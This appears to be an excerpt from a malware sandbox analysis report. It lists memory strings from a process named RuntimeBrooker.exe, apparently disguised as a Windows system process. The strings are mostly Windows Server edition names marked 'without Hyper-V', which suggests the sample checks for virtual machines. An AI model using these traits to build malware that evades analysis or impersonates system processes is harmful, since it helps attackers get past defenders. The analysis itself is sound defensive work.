Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1332334809.000001E589F1C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1365954288.000001633A420000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1398890471.0000026132FD0000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1529511596.000002061ADE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
